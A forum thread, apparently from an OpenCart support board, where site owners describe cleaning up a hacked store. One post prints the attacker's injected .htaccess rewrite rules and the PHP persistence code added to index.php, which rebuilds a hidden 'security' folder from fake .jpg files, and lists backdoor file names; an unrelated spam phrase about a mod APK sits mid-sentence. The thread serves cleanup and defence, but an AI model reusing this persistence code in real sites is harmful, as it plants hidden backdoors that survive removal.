if your website was hacked or injected please share your experience!

• Download all site files and database to your computer.
• Then you check all these files, find shell/backdoor/etc files and inserts of malicious code, delete all unnecessary ones. Delete all executable files from the images folder. Clear cache/modifications/cache/logs/unused language files. To search, you can use virus scanners, incl. desktop antivirus (Bitdefender, avast, nod32, drweb, kaspersky) and specialized on web (LMD, ai-bolit, revisium, etc, shell detector). You can also use GIT (compare your site with the original files, you can find malicious code in the modified files). In the case of applications with a single entry point (like opencart), you need to look for additional entry points into the application, namely - passing the parameters $ _GET, $ _POST, etc, as well as attempts to obfuscate them.
• Change all store administrator passwords in the database. Rename the admin account. Check the oc_modification table for malicious code.
• Change all possible passwords - to the database, to hosting, to your email, etc. Enable logging of server access requests, errors, etc.
• Use maintenance mode .htaccess rules. Delete the site from the hosting, load a clean copy of the site instead, enter new data in the configs to connect to the database.
• Protect your admin area from brute force with built-in HTTP authorization or Google reCAPTCHA.
• Install a script to monitor the activity of the file system (shows new / changed / deleted files). If new malicious files are created, then you missed something, but now you can look at the logs and the date of the file creation who visited where and calculate the malicious code. Delete it and observe again.

iDragonFly^ wrote: ↑

Sun Dec 26, 2021 6:54 pm

hi everyone,
who got through the same experience that i had, please share it here, to clean up the hacked files and how to prevent such issue from happening!
i assume the website was hacked or injected with some codes and loaded with files

under the main directory i saw new folders created:
under these folders there are some weird files i found:
(Remove them)
admin/error_logx.txt

admin/controller/extension/module

Code: Select all

(1): accesson.php  > this is a backdoor virus i think.
(2): Return.php > also a virus i think.
other files: 
4F49DF2A11.php
opheadar-lGVsyX.php
BAF77541E756.php
linksapis.php
lpinfo.php
readme_YKAVSBV.php
simple.php
statas.php
ulads.php
unlinks.php
error_log.txt

images > contains (banner_s.jpd , head_s.jpg, logo_s.jpg) but i don't think they are real jpg files.

security > container (idlogs.txt, index.php, logs.txt, map.txt, moban.html) P.S: the last name"moban in CH language means theme", if you delete it, it keeps creating the same folder with (index.php , moban.html and logs.txt) again and again! you need to remove all files i mentioned in this post.

websiteguide > contains several websiteamap.xml files

htaccss file > contains :

Code: Select all

<IfModule mod_rewrite.c>
Options +FollowSymLinks
RewriteEngine on
RewriteRule ^.*-(\d+)/$ security/index\.php?id=$1&%{QUERY_STRING} [L]
RewriteRule ^.*-r(\d+)/$ security/index\.php?cat=$1&%{QUERY_STRING} [L]
RewriteRule ^.*(website[a-z]+map\.xml)$  websiteguide/$1 [L]
RewriteBase /
</IfModule>

Index.php > the following code was added to the top: By the way, the htaccess file won't be deleted, unless you bring up the original index.php contents or delete this code from file header.

Code: Select all

//ck1bg
$nowFileDir =  'security';
$nowHtacFile =  './.htaccess';
$nmbf1 =  './security/moban.html';
$nowIndexFile =  './security/index.php';
$nowLogFile =  './security/logs.txt';
$bkLocalFileIndex1 =  './images/logo_s.jpg';
$bkLocalFileHtac1 =  './images/head_s.jpg';
$bkLocalFileMoban1 =  './images/banner_s.jpg';

if($nowHtacFile && file_exists($bkLocalFileHtac1)){
	if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@chmod($nowHtacFile,0755);
		@file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1));
		@chmod($nowHtacFile,0755);
	}
}


if(file_exists($bkLocalFileIndex1)){
	if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex1) && !file_exists($nowLogFile))){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@chmod($nowIndexFile,0755);
		@file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1));
		@chmod($nowIndexFile,0755);
	}
}

if(file_exists($bkLocalFileMoban1)){
	
	if(!file_exists($nmbf1)){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1));
		@chmod($nmbf1,0755);
	}else{
		if(filesize($nmbf1) != filesize($bkLocalFileMoban1)){
			$tpstrMb = file_get_contents($nmbf1);
			if(strstr($tpstrMb,"#bbbtitsbbb#") && !strstr($tpstrMb,"<!--ttt html5 tttt-->")){
				$fitime = filemtime($bkLocalFileMoban1);
				@chmod($bkLocalFileMoban1,0755);
				@file_put_contents($bkLocalFileMoban1,$tpstrMb);
				@touch($bkLocalFileMoban1, $fitime, $fitime);  
			}else{
				@chmod($bkLocalFileMoban1,0755);
				@file_put_contents($nmbf1,file_get_contents($bkLocalFileMoban1));
				@chmod($bkLocalFileMoban1,0755);
			}
		}
	}
	
}
//ck1end

* i also did a scan for folders Pokémon GO Mod Apk Unlimited everything and files and i found this file under the home directory is a trojan
404.shtml

EvolveWebHosting wrote: ↑

Tue Mar 01, 2022 10:39 am

How anyone has the patience to manually deal with attackers after they attack is mind boggling. It's always wiser to be proactive, not reactive. Attacks are fast and hard hitting. Typically, no two attacks are the same.

johnp wrote: ↑

Wed Mar 02, 2022 6:41 pm

EvolveWebHosting wrote: ↑

Tue Mar 01, 2022 10:39 am

How anyone has the patience to manually deal with attackers after they attack is mind boggling. It's always wiser to be proactive, not reactive. Attacks are fast and hard hitting. Typically, no two attacks are the same.

I totally agree. I stick Ninja Firewall on and let it automatically take care of hacks and banning hackers automatically.